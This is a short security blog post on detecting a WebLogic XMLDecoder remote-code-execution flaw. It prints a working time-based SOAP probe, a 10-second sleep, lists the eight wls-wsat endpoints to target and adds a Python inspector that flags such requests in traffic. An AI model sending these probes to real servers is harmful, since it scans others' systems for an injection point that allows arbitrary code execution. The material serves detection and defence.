Recently we faced a version of Oracle WebLogic vulnerable to CVE-2017-10271. The issue can be exploited to execute arbitrary Java code (and consequently arbitrary commands on the operating system of the application server).

The exploitation of the issue usually gives no output in server responses (it is “blind”). The best detection methods to find and confirm the presence of issues like this one are:

External service interaction (usually DNS resolution)

Time based

DNS resolution payloads have been published but our target implements strong egress filtering (including DNS resolution). In these situations, the best detection method in my opinion is the time based one.

This is a working time based detection payload (sleep of 10 seconds):

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java class="java.beans.XMLDecoder">
            <object class="java.lang.Thread" method="sleep">
              <long>10000</long>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>

To check for this issue the payload should be sent to the following paths:

/wls-wsat/CoordinatorPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/ParticipantPortType

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/RegistrationRequesterPortType11
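Added example (my code, not from the original post): a small Python inspector for the defending side that flags captured requests whose WorkContext SOAP header carries a java.beans.XMLDecoder document, run over a constructed copy of the sleep probe above and a benign request. The eight paths and the XML structure come from the post; the function name, verdict fields and sample bodies are assumptions of mine.

```python
import xml.etree.ElementTree as ET  # for untrusted input prefer defusedxml.ElementTree (same API)

WORK_NS = "http://bea.com/2004/06/soap/workarea/"
# The eight wls-wsat endpoints listed in the post.
WLS_WSAT_PATHS = {
    "/wls-wsat/CoordinatorPortType", "/wls-wsat/CoordinatorPortType11",
    "/wls-wsat/ParticipantPortType", "/wls-wsat/ParticipantPortType11",
    "/wls-wsat/RegistrationPortTypeRPC", "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/RegistrationRequesterPortType", "/wls-wsat/RegistrationRequesterPortType11",
}

def inspect_request(path: str, body: str) -> dict:
    """Classify one captured POST (path + body). A WorkContext header that
    carries a java.beans.XMLDecoder document is the signature of this bug
    class; the returned 'calls' list names what the decoder would invoke."""
    verdict = {"wsat_path": path in WLS_WSAT_PATHS, "xmldecoder": False,
               "calls": [], "suspicious": False}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return verdict  # not XML at all: not this bug class
    for ctx in root.iter(f"{{{WORK_NS}}}WorkContext"):
        # XMLDecoder tags are unqualified, so match them by local name.
        for java in ctx.iter("java"):
            if java.get("class") != "java.beans.XMLDecoder":
                continue
            verdict["xmldecoder"] = True
            for obj in java.iter("object"):
                cls, method = obj.get("class", "?"), obj.get("method")
                verdict["calls"].append(f"{cls}.{method}" if method else cls)
    # Alert on the header itself regardless of path; the path flag is
    # informational context for the analyst.
    verdict["suspicious"] = verdict["xmldecoder"]
    return verdict

# Constructed sample traffic: the post's 10 s sleep probe and a benign request.
SLEEP_PROBE = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java class="java.beans.XMLDecoder"><object class="java.lang.Thread" method="sleep">
<long>10000</long></object></java></work:WorkContext></soapenv:Header>
<soapenv:Body/></soapenv:Envelope>"""
BENIGN = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/><soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>"""

if __name__ == "__main__":
    for p, b in (("/wls-wsat/CoordinatorPortType", SLEEP_PROBE),
                 ("/wls-wsat/CoordinatorPortType", BENIGN)):
        print(p, inspect_request(p, b))
```

A hit on a wls-wsat path with a long server response time is the pairing to look for in access logs when hunting for the time-based probe described above.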

Cheers!

*** EDIT: as the reporter of the vulnerability noted on Reddit, the CVE number is wrong and this seems to be widespread. The correct number is CVE-2017-10352 ***